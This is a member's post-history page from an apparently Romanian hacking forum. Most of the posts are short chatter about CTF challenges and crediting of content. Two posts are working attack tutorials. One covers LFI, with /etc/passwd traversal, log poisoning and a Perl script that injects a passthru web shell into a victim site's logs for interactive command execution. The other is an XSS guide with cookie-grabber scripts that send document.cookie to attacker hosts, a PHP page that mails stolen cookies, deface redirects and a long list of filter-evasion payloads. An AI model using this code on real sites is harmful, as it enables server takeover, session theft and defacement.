Jump to content

CODEX

Active Members
 View Profile  See their activity

  • Posts

    1354

  • Joined

  • Last visited

  • Days Won

    8

 Content Type 

Everything posted by CODEX

  1. CODEX
    very devil esti mai satanist ca ei (joke ) cat desprpre satanism si de ce siteul vostru cred ca a explicat foarte bine HrN
  2. CODEX
    Aha deci era a lu vladii .. bun acuma trec si credit .. N-am stiut ca mai e postat odata ... Eventual un admin sa il trm la gunoi nu are rost sa fie de doua ori ... Trebuia sa caut ininte sa postez
  3. CODEX
    Nu l-am copiat . am in PC un folder plin cu totoriale cu chestii din astea despre xss lfi si tot felu M-am gandit sa il postez .. nimeni nu s-a semnat in el si le am si de mult ..
  4. CODEX

    Hack Test

    CODEX posted a topic in Challenges (CTF)

    http://www.hack-test.com/ sa va vad
  5. CODEX
    Nici el nu stia 99 sau 100% nedetectabil Head pune programu ala aici sa-l trm si io la unu
  6. CODEX
    Ca sa nu mai zic ca pe forumu ala is numa copy de pe RST luati tot ce se poate si copiati pur si simpl fara nici un CREDIT sau nici macar nu ziceti SURSA . Sa va fie rusine Cica hi5 vulnerabliltate .. cica a facut adminu o lista cu vulnearbilitatile hi5 si de fapt erau alea ale lu nemessis . Rusine ma altceva nu am ce sa zic Mai stergeti-l odata
  7. CODEX
    si ce cod malicios trimite ?
  8. CODEX

    ajutor la site

    CODEX replied to Spider_Pig's topic in Off-topic

    stai ca imi fac si io cont pe as.ro sa vad cum sta treaba
  9. CODEX
    Si de unde stii tu ca au citit regulile ? Practic sa mearga la reguli sa stea 60 de secunde si apoi sa dea activate cont sau ceva de genu..
  10. CODEX
    Buna ziua! In acest tutorial o sa invatati cum cum sa exploatati vulnerabilitatea LFI dintr-un site. Mai intai, sa vedem acest mic cod php: <?php $page = $_GET ; include($page); ?> Acesta este un cod care nu ar trebui folosit niciodata, vulnerabil la LFI, pentru ca variabila $page nu este santinizata. Ok, acum sa profitam de aceasta vulnerabilitate, folosind urmatorul cod: site.host/index.php?page=../../../../../../../etc/passwd In unele cazuri nu mai este nevoie sa punem ../../../../../../.., etc/passwd fiind de ajuns pentru a avea acces unde trebuie Daca siteul este gazduit Unix, parolele userilor sunt stocate in /etc/passwd (in cazul in care parola nu este shadow, in acest caz ea aflandu-se in /etc/shadow, unde vom putea avea acces doar daca am avea drepturi de root), si codul de mai sus ne arata aceste parole si usernameurile. Acum tot ce mai ai de facut este sa decodezi parola. O parola criptata(in acest caz, parola este shadowed si se afla in /etc/shadow), ar trebui sa arate cam asa: username:x:503:100:FullName:/home/username:/bin/sh In acest caz, parola este shadowed si se afla in /etc/shadow), alt exemplu de parola fiind: username:!:503:100:FullName:/home/username:/bin/sh Alte "locuri" unde puteti gasi parolele in afara de /etc/passwd ar cam fi: /etc/shadow /etc/group /etc/master.passwd /etc/security/group /etc/security/passwd /etc/security/user /etc/security/environ /etc/security/limits In caz ca Browserul va arata la sfarsitul includerii un .php (si automat. /etc/passwd.php nu va mai exista), adaugati la sf includerii %00, serverul va omite tot ce scrie dupa %00. Exemplu de cod: site.host/index.php?file=../../../../../../../../etc/passwd%00 Acum vom incerca sa rulam comenzi pe server injectand coduri php in loguri, apoi rulandu-le. Cateva adrese de loguri: ../apache/logs/error.log ../apache/logs/access.log ../../apache/logs/error.log ../../apache/logs/access.log ../../../apache/logs/error.log ../../../apache/logs/access.log ../../../../../../../etc/httpd/logs/acces_log ../../../../../../../etc/httpd/logs/acces.log ../../../../../../../etc/httpd/logs/error_log ../../../../../../../etc/httpd/logs/error.log ../../../../../../../var/www/logs/access_log ../../../../../../../var/www/logs/access.log ../../../../../../../usr/local/apache/logs/access_log ../../../../../../../usr/local/apache/logs/access.log ../../../../../../../var/log/apache/access_log ../../../../../../../var/log/apache2/access_log ../../../../../../../var/log/apache/access.log ../../../../../../../var/log/apache2/access.log ../../../../../../../var/log/access_log ../../../../../../../var/log/access.log ../../../../../../../var/www/logs/error_log ../../../../../../../var/www/logs/error.log ../../../../../../../usr/local/apache/logs/error_log ../../../../../../../usr/local/apache/logs/error.log ../../../../../../../var/log/apache/error_log ../../../../../../../var/log/apache2/error_log ../../../../../../../var/log/apache/error.log ../../../../../../../var/log/apache2/error.log ../../../../../../../var/log/error_log ../../../../../../../var/log/error.log Ok, acum sa aruncam o privire asupra logului in care se salveaza paginile care nu exista si urmatorul cod: <? passthru($_GET[cmd]) ?>. Daca scriem in browser: site.host/<? passthru($_GET[cmd]) ?> O sa ne arate evident o pagina in care scrie ca acest cod nu exista pe server, deoarece browserul encodeaza automat URL'ul si pagina pe care noi am accesat-o, browserul o traduce in: site.host/%3C?%20passthru($_GET[cmd])%20?> Deci va trebui sa facem altceva... Putem utiliza urmatorul script perl: #!/usr/bin/perl -w use IO::Socket; use LWP::UserAgent; $site="victim.com"; $path="/folder/"; $code="<? passthru($_GET[cmd]) ?>"; $log = "../../../../../../../etc/httpd/logs/error_log"; print "Trying to inject the code"; $socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$site", PeerPort=>"80") or die " Connection Failed. "; print $socket "GET ".$path.$code." HTTP/1.1 "; print $socket "User-Agent: ".$code." "; print $socket "Host: ".$site." "; print $socket "Connection: close "; close($socket); print " Code $code sucssefully injected in $log "; print " Type command to run or exit to end: "; $cmd = <STDIN>; while($cmd !~ "exit") { $socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$site", PeerPort=>"80") or die " Connection Failed. "; print $socket "GET ".$path."index.php=".$log."&cmd=$cmd HTTP/1.1 "; print $socket "Host: ".$site." "; print $socket "Accept: */* "; print $socket "Connection: close "; while ($show = <$socket>) { print $show; } print "Type command to run or exit to end: "; $cmd = <STDIN>; } Copy/Paste la chestia asta si salveaz-o ca ex.pl, dar nu uita sa modifici in exploit urmatoarele lucruri: 1) modifica numele siteului 2) modifica numele logului si calea catre el 3) schimba index.php= cu ce doresti tu Rulati scriptul si el va va intreba ce comenzi sa rulati !!! Va descurcati de aici incolo !!! Linkuri utile: http://www.milw0rm.com/video/watch.php?id=57 Acesta este un mic tutorial video, incercati sa-l vizionati ca este foarte bun. by Vladii
  11. CODEX

    Buna!

    CODEX replied to nimeni_altu's topic in Off-topic

    Important e ca omu vrea sa invete ceva ..si intai citeste forumu si apoi posteaza bine ai venit
  12. CODEX
    Mie mi-a mers ... acuma nu-l mai incerc din nou ca mie lene dar stiu sigur ca am luat un virus maker am facut un virus am oprit AV l-am facu nedetectabil am pornit AV si nu a zis nimik.... o sa-l mai testez odata pas cu pas cand am timp
  13. CODEX
    ce ? cum adica ? ia explica-ne si noua cum faci.. daca vrei bineinteles
  14. CODEX

    Site

    CODEX replied to Hertz's topic in Off-topic

    bravo ma.....bine lucrat mai ai de trecut niste lvle
  15. CODEX

    Site

    CODEX replied to Hertz's topic in Off-topic

    Level Name: Channel 5 Pai acolo ma pune sa downloadez o chestie pwd.exe da imi zice virusu...ma atenioneaza ca ii virus...l-am dezactivat si nu mai pot sa-l downloadez iim i da page not forund... in fine mai da-mi niste hinturi si la celelate
  16. CODEX
    Nah daca tot ai insistat 15 pct acuma tre sa trec si de celelate ca e interesant jocu
  17. CODEX
    Asa e mai bine ? O sa mai adaug cate ceva la el ( partea care-i lpiseste sa fie " mai complet"
  18. CODEX
    ok promit ca il traduc... incep acuma o sa fac ceva si pentru try..
  19. CODEX
    ? ________________________________________________________ | | Cross Site Scripting - Attack and Defense guide |________________________________________________________ By Xylitol . Tradus de CODEX in limba Romana pentru www.rstcenter.com INDEX : 1. Ce est un XSS ? 2. Unde si de ce apare XSS ? 3. Cum facem un cookie grabber 4. Cum ne aparam de un XSS 5. Metode deface 6. Filtre 7. Flash Atack 8. XSS Upload 9. Phishing XSS ______________________________________________ | | | .:: Capitolul 1 - Ce este un XSS ? ::. | |______________________________________________| In primul rand trebuie sa stim ca XSS este o vulnerabilitate ce apare la un server , site si permite introducerea unui script pe pagina HTML de pe un server. Un xss gasit s afiseaza intr-un textbox . _________________________________________________ | | | .:: Capitolul 2 - Unde si de ce apare XSS? ::. | |_________________________________________________| Xss apre din cauza filtrari proaste a codului sau in multe cazuri nu se filtreaza chiar deloc. O sa iau urmatorul cod este folosit in majoritatea tutorialelor pt a semnifica XSS. COD : <html> <head> <title>Xss Vulnerabilitate</title> </head> <!-- html --!><!--cel mai bine e daca folositi html--!> ..................... <form action="" method=post> codul Dvs:</br></br> <input type="text" name="xss"></br></br> <input type="submit" value="XSSvul"></br> </form> ...................... <!—mai departe e scriptul --!> <? if(isset($xss)) { .... //Daca exista xss atunci vom indeplini COD : echo \'$test \'; Aici apre Xss deoarece nu se filtreaza codul. codul este foarte slab incat nu poate filtra ca in cod sunt simboluri interzise ca : <> , / ' " etc. ________________________________________________ | |.: Chapter 3 - Make a cookie grabbers :. |________________________________________________| Insereaza acest cod intr-o pagina vulnerablia <script> window.open("http://www.Hax0r.com/cookie.php?cookies="+document.cookie); </script> (www.Hax0r.com = siteul tau) Deschideti notepad si faceti un document : cookie.php copy/past acest cod: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /> <title>Error</title> <style type="text/css"> <!-- body,td,th { color: #FFFFFF; } body { background-color: #000000; } --> </style></head> <? mail('email@example.com', 'Cookie stealed ! - thx xyli ', $cookies); ?> <body> <h2>Error - Access denied for <? echo $_SERVER["REMOTE_ADDR"]; ?></h2> </body> </html> _____________________________________________ | | | .:: Chapter 4 - Securing XSS ::. | |_____________________________________________| FIX it: Pentru a scapa de Vulnerabilitatile XSS folosim htmlentities: in linea 16 inlocuim: <body> <span class="alerte">Search result :</span><?php echo $_POST['Vulnerability']; ?> </body> cu: <body> <span class="alerte">Search result :</span><?php if(isset($_POST['Vulnerability'])) { echo htmlentities($_POST['Vulnerability']); } ?> </body> folosim htmlspecialchars() function in PHP alte functii: htmlentities() quotes strip_tags() ... ______________________________________________ | | .: Chapter 5 - Metode de deface :. |_____________________________________________| Aici defeaceul se poate face simplu , asta nu inseamna ca ai acces la baza de date sau ca stergi siteul ci doar inserezi o in codul HTML , cum ar fi : Deface cu o imagine : sau un flash video <EMBED SRC="http://hax0r.com/Haxored.swf" redirect: <script>window.open( "http://www.hax0r.com/Haxored.html" )</script> deasemena vdeti si: <meta http-equiv="refresh" content="0; url=http://hax0r.com/Haxored.html" /> _______________________________________________ | | .: Chapter 6 - Filtre si scripturi nefiltrate ::. |___ _________________________________________ <META HTTP-EQUIV=\"refresh\" CONTENT=\"0; URL=http://;URL=javascript:alert('XSS');\"> <META HTTP-EQUIV=\"refresh\" CONTENT=\"0;url=javascript:alert('XSS');\"> '">><marquee><h1>XSS</h1></marquee> '">><script>alert('XSS')</script> '>><marquee><h1>XSS</h1></marquee> "><script alert(String.fromCharCode(88,83,83))</script> <iframe<?php echo chr(11)?> onload=alert('XSS')></iframe> <div style="x:expression((window.r==1)?'':eval('r=1;alert(String.fromCharCo de(88,83,83));'))"> window.alert("Xyli !"); "/></a></><img src=1.gif onerror=alert(1)> mouse over <body onLoad="alert('XSS');" <body onunload="javascript:alert('XSS');"> click me <script language="JavaScript">alert('XSS')</script> '); alert('XSS <font style='color:expression(alert(document.cookie))'> <IMG DYNSRC=\"javascript:alert('XSS')\"> <IMG LOWSRC=\"javascript:alert('XSS')\"> </textarea><script>alert(/xss/)</script> </title><script>alert(/xss/)</script> <script src=http://yoursite.com/your_files.js></script> "><script>alert(0)</script> <IMG SRC=javascript:alert(String.fromCharCode(88,83,83))> <IMG SRC=\"jav ascript:alert('XSS');\"> <IMG SRC=\"jav ascript:alert('XSS');\"> <IMG SRC=\"jav ascript:alert('XSS');\"> <marquee><script>alert('XSS')</script></marquee> <? echo('<scr)'; echo('ipt>alert(\"XSS\")</script>'); ?> <IMG SRC=\"jav ascript:alert('XSS');\"> <IMG SRC=\"jav ascript:alert('XSS');\"> <marquee><script>alert('XSS')</script></marquee> <style>@im\port'\ja\vasc\ript:alert(\"XSS\")';</style> <img src=foo.png onerror=alert(/xssed/) /> <script>alert(String.fromCharCode(88,83,83))</script> <scr<script>ipt>alert('XSS');</scr</script>ipt> <script>location.href="http://www.evilsite.org/cookiegrabber.php?cookie="+ escape(document.cookie)</script> <script src="http://www.evilsite.org/cookiegrabber.php"></script> <script>alert('XSS');</script> <script>alert(1);</script> aici sunt doar o parte mai multe gasiti pe google. _____________________________________________ | | .: Chapter 7 - Flash attack :. |_____________________________________________| Flash is used for complex animations, simulations, *creation of games etc.. What’s interesting for us is the getURL() action. This function allows us to redirect the end user to another page. its syntax is built as follows: getURL(url:String, [window: String,[method:String]]) exemple: getURL("http://victime.com/login.php?logout=true","_self"); url: indicate the URL of the site window: specify within which framework the request must take place (_self, _blank…) method: method of request GET or POST (by defect GET) here the handling of the actionscript and the Javascript to post a alert: getURL("javascript:alert('XSS'"); in 2002 one will show the danger of this facility, one could for example post the cookie of visitors in this manner: getURL("javascript:alert(document.cookie)") in December 2005, a new alternative and appeared consisting has to benefit from a nonpermanent fault XSS and possibility of putting a file flash in its signature to give a permanent XSS, moreover the author of this alternative used this technique in order to infect MySpace with a deviated worms xss of Samy: Samy Reloaded cookie stealer in flash ? not but there is technique to do it exemple in a flash file: GetURL("http://www.victime.com/page.php?var=<script src='http://www.hax0r.com/Haxored.js'></script>","_self"); and in Haxored.js: document.location="http://hax0r.com/cookiestealer.php?cookie="+document.cookie; For secure it simple solution: do not allow flash files in your web app _____________________________________________ | | .: Chapter 8 - XSS upload :. |______________________________________________| Facet Haxored.gif in paint spre exemplu Dupa ce ati deschis Haxored.GIF in notepad Dati delete la to si inserati asta: GIF89a<script>alert("XSS")</script> Salvati si inchideti-o upload Haxored.gif intr-un free image hosting si apare XSS... * In mozilla nu va apare eroarea , pentru a vedea eroarea folositi IE De ce adaugam GIF89a ? well some upload like this one, check that the 'GIF89a' code is contained in the image as in any .GIF respective. the vulnerability of this upload results from the checking 'GIF89a' code for confirmation but of nothing the possible malicious codes contained in this image. GIF89a<script src="http://hax0r.com/cookiegrabber.php"></script> to know the code for another image format, it is just enough to open an image jpg or other with a text editor, for example a png file: ‰PNG PNG = ‰PNG GIF = GIF89a JPG =
  20. CODEX
    http://en-us.www.mozilla.com/en-US/firefox/phishing-protection/ siteul e jos..cel ce avea scamul
  21. CODEX
    asta-i alta acu fac un mai hi-tech
  22. CODEX

    nu stiu

    CODEX replied to LoadinG's topic in Tutoriale in romana

    cauta vulenrailitatea la site si incearca as accesezi fiserul unde se salveaa parolele cam stupida intrebarea mai bine ai citi ceva inainte sa intrebi
  23. CODEX

    Yahoo Bug ;)

    CODEX replied to nullbyte's topic in Exploituri

    Si tu ca un user cu putine posturi explicale celorlalti care nu si-au dat seama ca nu e un bug ca e un trik dohhh ma chiar nu avea rost sa postez deoare tot aia sa zis si mai sus ! in loc sa zici tu ca e un trikck nu bug mai bine zi ceva intelgent
  24. CODEX
    Din pacate am ajuns tarziu acasa ! asta l-am gfacut in 30 min... daca asteptati pana maine sau imi ziceti ceva indicatii mai fac sa aveti din ce alege
  25. CODEX
    pe la 2 vin acasa acu plec , va fac eu ceva frumos , sigur o sa va placa
×
×
  • Create New...